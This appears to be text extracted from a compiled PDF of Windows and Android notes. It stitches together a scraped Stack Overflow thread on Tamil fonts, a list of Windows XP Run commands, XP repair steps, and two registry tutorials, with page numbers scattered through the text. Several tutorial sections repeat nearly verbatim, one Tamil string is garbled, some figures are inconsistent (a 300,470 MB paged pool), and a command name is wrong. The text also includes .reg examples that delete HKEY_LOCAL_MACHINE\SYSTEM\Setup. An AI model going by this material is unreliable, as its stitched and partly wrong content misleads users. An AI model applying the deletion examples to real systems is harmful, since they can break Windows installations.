if you are using webview, place the your font file 'tamilfont.ttf' in the assets folder. and the java code will be similar to this. notice the font is applied in the css
data = "<html><head><style>@font-face {font-family: 'tamilfont';src: url('file:///android_asset/tamilfont.ttf');} h1 { font-family: 'tamilfont'; } </style></head><body> <h1>தமிழ !</h1> </body></html>";
WebView wv = (WebView)findViewById(R.id.webview);
wv.loadDataWithBaseURL(null, data, "text/html", "UTF-8", null);
this approach does not work in android 2.0 and 2.1.link|improve this answer answered Apr 18 '11 at 10:23
Sam Quest
2,2611414
hi i am using json and stored as string – tamil Apr 19 '11 at 12:47
32
what is your output control to display? WebView / TextView ... – Sam Quest Apr 20 '11 at 5:14
@PM - Paresh Mayani: could you kindly point me where 'he' has mentioned webview. i presume that 'he' is 'me'. ;) – Sam Quest Jul 1 '11 at 4:44
feedback
up vote
0
down vote
Step 1: Download a tamil font .ttf file. (For example say kanchi.ttf).
Step 2: Now create a directory "fonts" in your assets folder in the android project.
Step 3: Now copy the kanchi.ttf file into assets/fonts folder in you Android project.
Step 4: Add these lines to your onCreate()
protected static Typeface tamil = null;
tamil= Typeface.createFromAsset(getAssets(),"fonts/kanchi.ttf");
Step 5: Now provide this typeface to your TextView you want.
textview= (TextView) findViewById(R.id.tipstext);
33
textview.setTypeface(tamil);
textview.setTextSize(20);
textview.setText( "nkZk;");link|improve this answer answered Jul 1 '11 at 7:21
Andro Selva
3,9583825
hi thanks for ur help.i have another one doubt here i want to display like "இ த ெமாழிய : English" how to set this string in textview – tamil Jul 7 '11 at 6:11
I am not sure. But it's better if you use two textview for this type. – Andro Selva Jul 7 '11 at 6:14
feedback
up vote
0
down vote
check this, there is something going on about tamil unicode for android as inbuild
http://xkrishx.wordpress.com/2011/07/30/tamil-unicode-font-for-android/link|improve this answer
34
Run Command Codes:
1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
35
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
36
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
37
63. Network Setup Wizard - netsetup.cpl
64. Notepad notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
38
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
39
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver
116. Windows XP Tour Wizard - tourstart
117. Wordpad – write
Windows XP users
1. Insert the Windows XP bootable CD into the computer. 2. When prompted to press any key to boot from the CD, press any key. 3. Once in the Windows XP setup menu press the "R" key to repair Windows. 4. Log into your Windows installation by pressing the "1" key and pressing
enter. 5. You will then be prompted for your administrator password, enter that
password. 6. Copy the below two files to the root directory of the primary hard disk. In the
below example we are copying these files from the CD-ROM drive letter, which in this case is "e." This letter may be different on your computer. copy e:\i386\ntldr c:\ copy e:\i386\ntdetect.com c:\
40
7. Once both of these files have been successfully copied, remove the CD from the computer and reboot.
Windows Registry Tutorial
Overview
The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.
The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).
The Structure of the Registry
The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit
41
being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.
There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:
HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.
HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.
HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.
HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.
HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.
HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.
Each registry value is stored as one of five main data types:
REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.
42
REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.
REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)
REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)
REG_SZ - This type is a standard string, used to represent human readable text values.
Other data types not available through the standard registry editors include:
REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.
REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.
REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.
REG_NONE - No defined value type.
REG_QWORD - A 64-bit number.
REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.
REG_RESOURCE_LIST - A device-driver resource list.
Editing the Registry
43
The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below.
An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.
Create a Shortcut to Regedit
This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.
Using Regedit to modify your Registry
Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.
44
Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.
Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!
Importing and Exporting Registry Settings
A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02
The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values
45
are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.
So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.
Deleting keys or values using a REG file
It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:
REGEDIT4
[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]
The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=-
Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.
Regedit Command Line Options
Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.
46
regedit.exe [options] [filename] [regpath]
[filename]
Import .reg file into the registry
/s [filename]
Silent import, i.e. hide confirmation box when importing files
/e [filename] [regpath]
Export the registry to [filename] starting at [regpath] e.g. regedit /e file.reg HKEY_USERS\.DEFAULT
/L:system
Specify the location of the system.dat to use
/R:user
Specify the location of the user.dat to use
C [filename]
Compress (Windows 98)
/D [regpath]
Delete the specified key (Windows 98)
Maintaining the Registry
On Windows NT you can use either the "Last Known Good" option or RDISK to restore to registry to a stable working configuration.
How can I clean out old data from the Registry? Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process, the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it
47
removes them from the Windows Registry after having recording those entries in the Undo.Reg file.
Importing and Exporting Registry Settings
A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,02
The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.
So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.
48
Deleting keys or values using a REG file
It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:
REGEDIT4
[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]
The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=-
Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.
Regedit Command Line Options
49
Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.
regedit.exe [options] [filename] [regpath]
[filename] Import .reg file into the registry
/s [filename] Silent import, i.e. hide confirmation box when importing files
/e [filename] [regpath] Export the registry to [filename] starting at [regpath]
e.g. regedit /e file.reg HKEY_USERS\.DEFAULT
/L:system Specify the location of the system.dat to use
/R:user Specify the location of the user.dat to use
/C [filename] Compress (Windows 98)
/D [regpath] Delete the specified key (Windows 98)
The expected skills:
Able to understand Windows Registry.
Able to understand and use functions to manipulate Windows Registry.
50
Able to gather and understand the required information in order to use those functions.
Introduction
The registry is a system-defined database in which applications and system components store and retrieve configuration data. The data stored in the registry varies according to the version of Microsoft® Windows®. Applications use the registry API to retrieve, modify, or delete registry data. You should not edit registry data that does not belong to your application unless it is absolutely necessary. If there is an error in the registry, your system may not function properly. If this happens, you can restore the registry to the state it was in when you last started the computer successfully.
Structure of the Registry
The registry stores data in a tree format. Each node in the tree is called a key. Each key can contain both subkeys and data entries called values. Sometimes, the presence of a key is all the data that an application requires; other times, an application opens a key and uses the values associated with the key. A key can have any number of values, and the values can be in any form. Each key has a name consisting of one or more printable characters. Key names cannot include a backslash (\), but any other printable or unprintable character can be used. The name of each subkey is unique with
51
respect to the key that is immediately above it in the hierarchy. Key names are not localized into other languages, although values may be. The following figure is an example registry key structure as displayed by the Registry Editor (regedit.exe).
Figure 1: Registry Editor.
Each of the trees under My Computer is a key. The HKEY_LOCAL_MACHINE key has the following subkeys: HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM. Each value consists of a value name and its associated data, if any. MaxObjectNumber and VgaCompatible are values under the DEVICEMAP\VIDEO subkey that contain data.
Registry Storage Space
52
Although there are few technical limits to the type and size of data an application can store in the registry, certain practical guidelines exist to promote system efficiency. An application should store configuration and initialization data in the registry, and store other kinds of data elsewhere. Generally, data consisting of more than one or two kilobytes (KB) should be stored as a file and referred to by using a key in the registry rather than being stored as a value. Instead of duplicating large pieces of data in the registry, an application should save the data as a file and refer to the file. Executable binary code should never be stored in the registry. A value entry uses much less registry space than a key. To save space, an application should group similar data together as a structure and store the structure as a value rather than storing each of the structure members as a separate key. Storing the data in binary form allows an application to store data in one value that would otherwise be made up of several incompatible types.
Windows Server 2003 and Windows XP
Views of the registry files are mapped in the computer cache address space. Therefore, regardless of the size of the registry data, it is not charged more than 4 megabytes (MB). There are no longer any explicit limits on the total amount of space that may be consumed by hives in paged pool memory, and in disk space. The size of the system hive is limited only by physical memory.
Windows 2000 and Windows NT
Registry data is stored in the paged pool, an area of physical memory used for system data that can be written to disk when not in use. The RegistrySizeLimit value establishes the maximum amount of paged pool that can be consumed by registry data from all applications. This value is located in the following registry key:
HKEY_LOCAL_MACHINE
System
CurrentControlSet
Control
53
By default, the registry size limit is 25 percent of the paged pool. The default size of the paged pool is 32 MB, so this is 8 MB. The system ensures that the minimum value of RegistrySizeLimit is 4 MB and the maximum is approximately 80 percent of the PagedPoolSize value. If the value of this entry is greater than 80 percent of the size of the paged pool, the system sets the maximum size of the registry to 80 percent of the size of the paged pool. This prevents the registry from consuming space needed by processes. Note that setting this value does not allocate space in the paged pool, nor does it assure that the space will be available if needed. The paged pool size is determined by the PagedPoolSize value in the following registry key:
HKEY_LOCAL_MACHINE
System
CurrentControlSet
Control
SessionManager
MemoryManagement
Windows 2000: The maximum paged pool is approximately 300,470 MB so the registry size limit is 240-376 MB. However, if the /3GB switch is used, the maximum paged pool size is 192 MB, so the registry can be a maximum of 153.6 MB.
Windows NT 4.0: The maximum paged pool size is 192 MB, so the registry size limit is 153.6 MB.
Windows NT 3.51 and earlier: The maximum paged pool is 128 MB, so the registry size limit is 102 MB.
Predefined Keys
An application must open a key before it can add data to the registry. To open a key, an application must supply a handle to another key in the
54
registry that is already open. The system defines predefined keys that are always open. Predefined keys help an application navigate in the registry and make it possible to develop tools that allow a system administrator to manipulate categories of data. Applications that add data to the registry should always work within the framework of predefined keys, so administrative tools can find and use the new data.
An application can use handles to these keys as entry points to the registry. These handles are valid for all implementations of the registry, although the use of the handles may vary from platform to platform. In addition, other predefined handles have been defined for specific platforms. The following are handles to the predefined keys.
Handle
Description
HKEY_CLASSES_ROOT
Registry entries subordinate to this key define types (or classes) of documents and the properties associated with those types. Shell and COM applications use the information stored under this key. This key also provides backward compatibility with the Windows 3.1 registration database by storing information for DDE and OLE support. File viewers and user interface extensions store their OLE class identifiers in HKEY_CLASSES_ROOT, and in-process servers are registered in this key. This handle should not be used in a service or an application that impersonates different users.
HKEY_CURRENT_CONFIG
Contains information about the current hardware profile of the local computer system. The information under HKEY_CURRENT_CONFIG describes only the differences between the current hardware configuration and the standard configuration. Information about the standard hardware configuration is stored under the Software and System keys of HKEY_LOCAL_MACHINE.
HKEY_CURRENT_CONFIG is an alias for HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current.
55
Windows NT 3.51 and earlier: This key does not exist.
HKEY_CURRENT_USER
Registry entries subordinate to this key define the preferences of the current user. These preferences include the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences. This key makes it easier to establish the current user's settings; the key maps to the current user's branch in HKEY_USERS. In HKEY_CURRENT_USER, software vendors store the current user-specific preferences to be used within their applications. Microsoft, for example, creates the HKEY_CURRENT_USER\Software\Microsoft key for its applications to use, with each application creating its own subkey under the Microsoft key. This handle should not be used in a service or an application that impersonates different users. Instead, call the RegOpenCurrentUser() function.
HKEY_DYN_DATA
Windows Me/98/95: Registry entries subordinate to this key allow you to collect performance data.
HKEY_LOCAL_MACHINE
Registry entries subordinate to this key define the physical state of the computer, including data about the bus type, system memory, and installed hardware and software. It contains subkeys that hold current configuration data, including Plug and Play information (the Enum branch, which includes a complete list of all hardware that has ever been on the system), network logon preferences, network security information, software-related information (such as server names and the location of the server), and other system information.
HKEY_PERFORMANCE_DATA
Registry entries subordinate to this key allow you to access performance data. The data is not actually stored in the registry; the registry functions cause the system to collect the data from its source. Windows Me/98/95: This key is not supported.
HKEY_PERFORMANCE_NLSTEXT
56
Registry entries subordinate to this key reference the text strings that describe counters in the local language of the area in which the computer system is running. These entries are not available to Regedit.exe and Regedt32.exe.
Windows 2000/NT, Windows Me/98/95: This key is not supported.
HKEY_PERFORMANCE_TEXT
Registry entries subordinate to this key reference the text strings that describe counters in US English. These entries are not available to Regedit.exe and Regedt32.exe. For Windows 2000/NT, Windows Me/98/95: This key is not supported.
HKEY_USERS
Registry entries subordinate to this key define the default user configuration for new users on the local computer and the user configuration for the current user.
Table 1.
The RegOverridePredefKey() function enables you to map a predefined registry key to a specified key in the registry. For instance, a software installation program could remap a predefined key before installing a DLL component. This enables the installation program to easily examine the information that the DLL's installation procedure writes to the predefined key.
57
Figure 2: HKEY_CLASSES_ROOT registry key.
Figure 3: HKEY_CURRENT_USER registry key.
58
Figure 4: HKEY_LOCAL_MACHINE registry key.
Figure 5: HKEY_USERS registry key.
59
Figure 6: HKEY_CURRENT_CONFIG registry key.
Registry Hives
A hive is a group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data. The setup phase of the Windows boot process automatically retrieves data from these supporting files. You can also retrieve data manually using the Import Registry File menu item of the Registry Editor (Regedit.exe). When you shut down Windows, the operating system automatically writes the hive data to the supporting files. You can also back up the hive data manually using the Export Registry File menu item of the Registry Editor.
The supporting files for all hives except HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config directory; the supporting files for HKEY_CURRENT_USER are in the %SystemRoot%\Documents and Settings\Username directory and for Windows NT it is in %SystemRoot%\Profiles\Username directory. The file name extensions of the files in these directories, and in some cases a lack of an extension, indicate the type of data they contain. The following table lists these extensions along with a description of the data in the file.
60
Figure 7: The C:\Documents and Settings\Johnny directory, user supporting
files.
Figure 8: C:\WINDOWS\system32\config directory, supporting files for all hives.
61
Extension
Description
No extension
A complete copy of the hive data.
.alt
A backup copy of the critical HKEY_LOCAL_MACHINE\System hive. Only the System key has an .alt file.
.log
A transaction log of changes to the keys and value entries in the hive.
.sav
Copies of the hive files as they looked at the end of the text-mode stage in Setup.
Setup has two stages: text mode and graphics mode. The hive is copied to a .sav file after the text-mode stage of setup to protect it from errors that might occur if the graphics-mode stage of setup fails. If setup fails during the graphics-mode stage, only the graphics-mode stage is repeated when the computer is restarted; the .sav file is used to restore the hive data.
Table 2.
The following table lists the standard hives and their supporting files.
Registry hive
Supporting files
HKEY_CURRENT_CONFIG
System, System.alt, System.log, System.sav
62
HKEY_CURRENT_USER
Ntuser.dat, Ntuser.dat.log
HKEY_LOCAL_MACHINE\SAM
Sam, Sam.log, Sam.sav
HKEY_LOCAL_MACHINE\Security
Security, Security.log, Security.sav
HKEY_LOCAL_MACHINE\Software
Software, Software.log, Software.sav
HKEY_LOCAL_MACHINE\System
System, System.alt, System.log, System.sav
HKEY_USERS\.DEFAULT
Default, Default.log, Default.sav
Table 3.
Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user's hive contains specific registry information pertaining to the user's application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. The supporting file for the user profile hive for a particular user is located in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\ CurrentVersion\ProfileList\SID\ProfileImagePath, and is named Ntuser.dat. The value of ProfileImagePath is a binary representation of the directory name of the user's profile, which includes the user's name. Use the Registry Editor to display this binary value as a string.
63
Figure 9: User (Johnny) profile hives under ProfileList key.
Figure 10: Ntuser.dat, the supporting file for the user (Johnny) profile hive.
Categories of Data
Before putting data into the registry, an application should divide the data into two categories:
64
Computer-specific data and
User-specific data.
By making this distinction, an application can support multiple users, and yet locate user-specific data over a network and use that data in different locations, allowing location-independent user profile data. A user profile is a set of configuration data saved for every user. When the application is installed, it should record the computer-specific data under the HKEY_LOCAL_MACHINE key. In particular, it should create keys for the company name, product name, and version number, as shown in the following example:
HKEY_LOCAL_MACHINE\Software\MyCompany\MyProduct\1.0
If the application supports COM, it should record that data under HKEY_LOCAL_MACHINE\Software\Classes. An application should record user-specific data under the HKEY_CURRENT_USER key, as shown in the following example:
HKEY_CURRENT_USER\Software\MyCompany\MyProduct\1.0
Opening, Creating, and Closing Keys
Before an application can add data to the registry, it must create or open a key. To create or open a key, an application always refers to the key as a subkey of a currently open key. The following predefined keys are always open:
HKEY_LOCAL_MACHINE.
HKEY_CLASSES_ROOT.
HKEY_USERS and
HKEY_CURRENT_USER.
\An application uses the RegOpenKeyEx() function to open a key and the RegCreateKeyEx() function to create a key.
65
An application can use the RegCloseKey() function to close a key and write the data it contains into the registry. RegCloseKey() does not necessarily write the data to the registry before returning; it can take as much as several seconds for the cache to be flushed to the hard disk. If an application must explicitly write registry data to the hard disk, it can use the RegFlushKey() function. RegFlushKey(), however, uses many system resources and should be called only when absolutely necessary.
Writing and Deleting Registry Data
An application can use the RegSetValueEx() function to associate a value and its data with a key. To delete a value from a key, an application can use the RegDeleteValue() function. To delete a key, it can use the RegDeleteKey() function. A deleted key is not removed until the last handle to it has been closed. Subkeys and values cannot be created under a deleted key. It is not possible to lock a registry key during a write operation to synchronize access to the data. However, you can control access to a registry key using security attributes.
Retrieving Data from the Registry
To retrieve data from the registry, an application typically enumerates the subkeys of a key until it finds a particular one and then retrieves data from the value or values associated with it. An application can call the RegEnumKeyEx() function to enumerate the subkeys of a given key. To retrieve detailed data about a particular subkey, an application can call the RegQueryInfoKey() function. The RegGetKeySecurity() function retrieves a copy of the security descriptor protecting a key. An application can use the RegEnumValue() function to enumerate the values for a given key, and RegQueryValueEx() function to retrieve a particular value for a key. An application typically calls RegEnumValue() to determine the value names and then RegQueryValueEx() to retrieve the data for the names.
The RegQueryMultipleValues() function retrieves the type and data for a list of value names associated with an open registry key. This function is useful for dynamic key providers because it assures consistency of data by retrieving multiple values in an atomic operation. Because other applications can change the data in a registry value between the time your application can read a value and use it, you may need to ensure your application has the latest data. You can use the RegNotifyChangeKeyValue() function to notify
66
the calling thread when there are changes to the attributes or contents of a registry key, or if the key is deleted. The function signals an event object to notify the caller. If the thread that calls RegNotifyChangeKeyValue() exits, the event is signaled and the monitoring of the registry key is stopped. You can control or specify what changes should be reported through the use of a notify filter or flag. Usually, changes are reported by signaling an event that you specify to the function. Note that the RegNotifyChangeKeyValue() function does not work with remote handles.
Registry Files
Applications can save part of the registry in a file and then load the contents of the file back into the registry. A registry file is useful when a large amount of data is being manipulated, when many entries are being made in the registry, or when the data is transitory and must be loaded and then unloaded again. Applications that back up and restore parts of the registry are likely to use registry files. To save a key and its subkeys and values to a registry file, an application can call the RegSaveKey() function. RegSaveKey() creates the file with the following information, depending upon which operating system it is running on.
System
File attributes
Location if no path is specified
Error returned if file already exists
Windows Me/98/95
Archive, hidden, read-only system
Created in the Windows directory for both local and remote keys.
Error code 1016, ERROR_REGISTRY_IO_FAILED
Windows Server 2003, Windows XP/2000/NT
Archive
67
Created in the current directory of the process for a local key, and in the %systemroot%\system32 directory for a remote key.
Error code 183, ERROR_ALREADY_EXISTS
Table 4.
To write the registry file back to the registry, an application can use the RegLoadKey(), RegReplaceKey(), or RegRestoreKey() function. RegLoadKey() loads registry data from a specified file into a specified subkey under HKEY_USERS or HKEY_LOCAL_MACHINE on the calling application's computer or on a remote computer. The function creates the specified subkey if it does not already exist. After calling this function, an application can use the RegUnLoadKey() function to restore the registry to its previous state. RegReplaceKey() replaces a key and all its subkeys and values in the registry with the data contained in a specified file. The new data takes effect the next time the system is started.
RegRestoreKey() loads registry data from a specified file into a specified key on the calling application's computer or on a remote computer. This function replaces the subkeys and values below the specified key with the subkeys and values that follow the top-level key in the file. The RegConnectRegistry() function establishes a connection to a predefined registry handle on another computer. An application uses this function primarily to access information from a remote registry on other machines in a network environment, which you can also do by using the Registry Editor. You might want to access a remote registry to back up a registry or regulate network access to it. Note that you must have appropriate permissions to access a remote registry using this function.
Registry Key Security and Access Rights
The Windows security model enables you to control access to registry keys. You can specify a security descriptor for a registry key when you call the RegCreateKeyEx() or RegSetKeySecurity() function. If you specify NULL, the key gets a default security descriptor. The ACLs in a default security descriptor for a key are inherited from its direct parent key. To get the security descriptor of a registry key, call the GetNamedSecurityInfo() or GetSecurityInfo() function. The valid access rights for registry keys include the DELETE, READ_CONTROL, WRITE_DAC, and WRITE_OWNER standard access rights. Registry keys do not support the SYNCHRONIZE
68
standard access right. The following table lists the specific access rights for registry key objects.
Value
Meaning
KEY_ALL_ACCESS
Combines the STANDARD_RIGHTS_REQUIRED, KEY_QUERY_VALUE, KEY_SET_VALUE, KEY_CREATE_SUB_KEY, KEY_ENUMERATE_SUB_KEYS, KEY_NOTIFY, and KEY_CREATE_LINK access rights.
KEY_CREATE_LINK
Reserved for system use.
KEY_CREATE_SUB_KEY
Required to create a subkey of a registry key.
KEY_ENUMERATE_SUB_KEYS
Required to enumerate the subkeys of a registry key.
KEY_EXECUTE
Equivalent to KEY_READ.
KEY_NOTIFY
Required to request change notifications for a registry key or for subkeys of a registry key.
